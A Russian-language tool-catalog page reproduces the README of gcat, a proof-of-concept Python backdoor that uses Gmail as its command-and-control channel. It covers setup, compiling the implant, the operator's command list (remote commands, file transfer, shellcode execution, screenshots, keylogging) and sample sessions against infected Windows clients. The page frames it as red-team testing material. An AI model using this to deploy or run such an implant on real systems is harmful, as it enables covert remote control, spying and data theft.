Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
gcat — PoC-бэкдор, использующий Gmail в качестве C&C сервера | Kitploit
Инструменты/GitHubGitHub/byt3bl33d3r/gcat
ЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной НагрузкиТроян Удаленного ДоступаArchived
GitHubbyt3bl33d3r/gcat

gcat

PoC-бэкдор, использующий Gmail в качестве C&C сервера

Репозиторий
1.4k4167 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Gcat

Стелс-бэкдор на Python, использующий Gmail в качестве сервера управления и контроля

Этот проект был вдохновлён оригинальным PoC-кодом от Бенджамина Доннелли

Это PoC-код...

... который был выпущен для организаций, чтобы они могли проверить свою защиту от атак такого типа. Для их обнаружения смотрите проекты вроде RITA.

Более актуальную и поддерживаемую версию этого проекта см. в GDog

Настройка

Для работы вам потребуется:

  • Учётная запись Gmail (Используйте выделенный аккаунт! Не используйте свой личный!)
  • Включите «Allow less secure apps» в настройках безопасности аккаунта
  • Возможно, также потребуется включить IMAP в настройках аккаунта

Этот репозиторий содержит два файла:

  • gcat.py — скрипт для перечисления и отправки команд доступным клиентам
  • implant.py — собственно бэкдор для развёртывания

В обоих файлах отредактируйте переменные gmail_user и gmail_pwd, указав имя пользователя и пароль от ранее настроенного аккаунта.

Вероятно, вы захотите скомпилировать implant.py в исполняемый файл с помощью Pyinstaller

Примечание: рекомендуется компилировать implant.py с использованием 32-битной установки Python

Использование

root@kitploit:~
                                             dP   
                                             88   
                .d8888b. .d8888b. .d8888b. d8888P 
                88'  `88 88'  `"" 88'  `88   88   
                88.  .88 88.  ... 88.  .88   88   
                `8888P88 `88888P' `88888P8   dP   
                     .88                          
                 d8888P  
                     

                   .__....._             _.....__,
                     .": o :':         ;': o :".
                     `. `-' .'.       .'. `-' .'   
                       `---'             `---'  

             _...----...      ...   ...      ...----..._
          .-'__..-''----    `.  `"`  .'    ----'''-..__`-.
         '.-'   _.--'''       `-._.-'       ''''--._   `-.`
         '  .-"'                  :                  `"-.  `
           '   `.              _.'"'._              .'   `
                 `.       ,.-'"       "'-.,       .'
                   `.                           .'
              jgs    `-._                   _.-'
                         `"'--...___...--'"`

                     ...IM IN YUR COMPUTERZ...

                        WATCHIN YUR SCREENZ

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -upload SRC DST       Upload a file to the clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Meow!

  • После развёртывания бэкдора на нескольких системах вы можете проверить доступных клиентов командой list:
root@kitploit:~
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

Вывод представляет собой строку UUID, уникально идентифицирующую систему и ОС, на которой работает имплант.

  • Давайте отправим команду импланту:
root@kitploit:~
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

Здесь мы указываем 90b2cd83-cb36-52de-84ee-99db6ff41a11 выполнить ipconfig /all, скрипт выводит jobid, который мы можем использовать для получения вывода этой команды.

  • Получаем результаты!
root@kitploit:~
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
  • Вот и вся суть! Но вы можете сделать гораздо больше, как видно из использования скрипта! ;)

Планы

  • Поддержка нескольких платформ
  • Команда для загрузки файлов
  • Транспортное шифрование и обфускация
Скачать инструмент